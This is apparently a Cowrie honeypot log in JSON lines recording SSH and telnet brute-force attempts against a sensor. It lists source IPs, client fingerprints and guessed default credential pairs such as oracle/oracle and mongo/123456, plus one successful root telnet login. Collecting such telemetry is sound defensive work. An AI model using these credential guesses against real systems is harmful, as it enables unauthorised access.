,"ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:18:24.974787Z","src_ip":"212.227.235.229","session":"5637f8779bf3"}
{"eventid":"cowrie.login.failed","username":"hive","password":"hive","message":"login attempt [hive/hive] failed","sensor":"my-vps","timestamp":"2025-08-28T05:18:25.570950Z","src_ip":"212.227.235.229","session":"5637f8779bf3"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:18:26.717357Z","src_ip":"212.227.235.229","session":"5637f8779bf3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42912,"dst_ip":"1.2.3.4","dst_port":22,"session":"f7f7bfc01bf0","protocol":"ssh","message":"New connection: 212.227.125.160:42912 (1.2.3.4:22) [session: f7f7bfc01bf0]","sensor":"my-vps","timestamp":"2025-08-28T05:18:32.279680Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:18:32.356169Z","src_ip":"212.227.125.160","session":"f7f7bfc01bf0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:18:32.469563Z","src_ip":"212.227.125.160","session":"f7f7bfc01bf0"}
{"eventid":"cowrie.login.failed","username":"git","password":"git","message":"login attempt [git/git] failed","sensor":"my-vps","timestamp":"2025-08-28T05:18:33.094146Z","src_ip":"212.227.125.160","session":"f7f7bfc01bf0"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:18:34.201482Z","src_ip":"212.227.125.160","session":"f7f7bfc01bf0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59136,"dst_ip":"1.2.3.4","dst_port":22,"session":"0fc9fc1625ca","protocol":"ssh","message":"New connection: 212.227.235.229:59136 (1.2.3.4:22) [session: 0fc9fc1625ca]","sensor":"my-vps","timestamp":"2025-08-28T05:18:39.114628Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:18:39.115752Z","src_ip":"212.227.235.229","session":"0fc9fc1625ca"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:18:39.310073Z","src_ip":"212.227.235.229","session":"0fc9fc1625ca"}
{"eventid":"cowrie.login.failed","username":"git","password":"git","message":"login attempt [git/git] failed","sensor":"my-vps","timestamp":"2025-08-28T05:18:39.838727Z","src_ip":"212.227.235.229","session":"0fc9fc1625ca"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:18:40.985124Z","src_ip":"212.227.235.229","session":"0fc9fc1625ca"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37668,"dst_ip":"1.2.3.4","dst_port":22,"session":"6bd3dc45026e","protocol":"ssh","message":"New connection: 212.227.235.229:37668 (1.2.3.4:22) [session: 6bd3dc45026e]","sensor":"my-vps","timestamp":"2025-08-28T05:18:46.137280Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:18:46.243051Z","src_ip":"212.227.235.229","session":"6bd3dc45026e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59656,"dst_ip":"1.2.3.4","dst_port":22,"session":"a443ec91ff33","protocol":"ssh","message":"New connection: 212.227.125.160:59656 (1.2.3.4:22) [session: a443ec91ff33]","sensor":"my-vps","timestamp":"2025-08-28T05:18:46.484097Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:18:46.540416Z","src_ip":"212.227.125.160","session":"a443ec91ff33"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:18:46.648187Z","src_ip":"212.227.125.160","session":"a443ec91ff33"}
{"eventid":"cowrie.login.failed","username":"wang","password":"wang123","message":"login attempt [wang/wang123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:18:47.090242Z","src_ip":"212.227.125.160","session":"a443ec91ff33"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:18:48.278493Z","src_ip":"212.227.125.160","session":"a443ec91ff33"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39640,"dst_ip":"1.2.3.4","dst_port":22,"session":"57bae0236435","protocol":"ssh","message":"New connection: 212.227.235.229:39640 (1.2.3.4:22) [session: 57bae0236435]","sensor":"my-vps","timestamp":"2025-08-28T05:18:53.378495Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:18:53.379497Z","src_ip":"212.227.235.229","session":"57bae0236435"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:18:53.522811Z","src_ip":"212.227.235.229","session":"57bae0236435"}
{"eventid":"cowrie.login.failed","username":"wang","password":"wang123","message":"login attempt [wang/wang123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:18:53.953929Z","src_ip":"212.227.235.229","session":"57bae0236435"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:18:55.099003Z","src_ip":"212.227.235.229","session":"57bae0236435"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41942,"dst_ip":"1.2.3.4","dst_port":22,"session":"ff436e9d9d3f","protocol":"ssh","message":"New connection: 212.227.125.160:41942 (1.2.3.4:22) [session: ff436e9d9d3f]","sensor":"my-vps","timestamp":"2025-08-28T05:19:00.741500Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:19:00.760841Z","src_ip":"212.227.125.160","session":"ff436e9d9d3f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:19:00.846562Z","src_ip":"212.227.125.160","session":"ff436e9d9d3f"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"nginx","message":"login attempt [nginx/nginx] failed","sensor":"my-vps","timestamp":"2025-08-28T05:19:01.260108Z","src_ip":"212.227.125.160","session":"ff436e9d9d3f"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:19:02.366022Z","src_ip":"212.227.125.160","session":"ff436e9d9d3f"}
{"eventid":"cowrie.session.connect","src_ip":"176.65.149.186","src_port":37942,"dst_ip":"1.2.3.4","dst_port":23,"session":"d46b3704062f","protocol":"telnet","message":"New connection: 176.65.149.186:37942 (1.2.3.4:23) [session: d46b3704062f]","sensor":"my-vps","timestamp":"2025-08-28T05:19:16.669956Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:19:16.779360Z","src_ip":"176.65.149.186","session":"d46b3704062f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:19:16.857625Z","src_ip":"176.65.149.186","session":"d46b3704062f"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-08-28T05:19:16.858823Z","src_ip":"176.65.149.186","session":"d46b3704062f"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-08-28T05:19:16.859621Z","src_ip":"176.65.149.186","session":"d46b3704062f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58834,"dst_ip":"1.2.3.4","dst_port":22,"session":"59c413ced5f1","protocol":"ssh","message":"New connection: 212.227.125.160:58834 (1.2.3.4:22) [session: 59c413ced5f1]","sensor":"my-vps","timestamp":"2025-08-28T05:19:18.670805Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:19:18.671641Z","src_ip":"212.227.125.160","session":"59c413ced5f1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:19:18.776894Z","src_ip":"212.227.125.160","session":"59c413ced5f1"}
{"eventid":"cowrie.login.failed","username":"mongo","password":"123456","message":"login attempt [mongo/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T05:19:19.093889Z","src_ip":"212.227.125.160","session":"59c413ced5f1"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:19:20.201064Z","src_ip":"212.227.125.160","session":"59c413ced5f1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43130,"dst_ip":"1.2.3.4","dst_port":22,"session":"ba1333f678d7","protocol":"ssh","message":"New connection: 212.227.235.229:43130 (1.2.3.4:22) [session: ba1333f678d7]","sensor":"my-vps","timestamp":"2025-08-28T05:19:38.738784Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:19:38.740350Z","src_ip":"212.227.235.229","session":"ba1333f678d7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:19:38.884285Z","src_ip":"212.227.235.229","session":"ba1333f678d7"}
{"eventid":"cowrie.login.failed","username":"mongo","password":"123456","message":"login attempt [mongo/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T05:19:39.317825Z","src_ip":"212.227.235.229","session":"ba1333f678d7"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:19:40.464378Z","src_ip":"212.227.235.229","session":"ba1333f678d7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48632,"dst_ip":"1.2.3.4","dst_port":22,"session":"b4632620dd79","protocol":"ssh","message":"New connection: 212.227.125.160:48632 (1.2.3.4:22) [session: b4632620dd79]","sensor":"my-vps","timestamp":"2025-08-28T05:19:55.054459Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:19:55.057215Z","src_ip":"212.227.125.160","session":"b4632620dd79"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:19:55.159786Z","src_ip":"212.227.125.160","session":"b4632620dd79"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"oracle","message":"login attempt [oracle/oracle] failed","sensor":"my-vps","timestamp":"2025-08-28T05:19:55.575270Z","src_ip":"212.227.125.160","session":"b4632620dd79"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45788,"dst_ip":"1.2.3.4","dst_port":22,"session":"be065c10c1c9","protocol":"ssh","message":"New connection: 212.227.235.229:45788 (1.2.3.4:22) [session: be065c10c1c9]","sensor":"my-vps","timestamp":"2025-08-28T05:19:55.824798Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:19:55.825902Z","src_ip":"212.227.235.229","session":"be065c10c1c9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:19:55.969051Z","src_ip":"212.227.235.229","session":"be065c10c1c9"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"oracle","message":"login attempt [oracle/oracle] failed","sensor":"my-vps","timestamp":"2025-08-28T05:19:56.609699Z","src_ip":"212.227.235.229","session":"be065c10c1c9"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:19:56.686179Z","src_ip":"212.227.125.160","session":"b4632620dd79"}
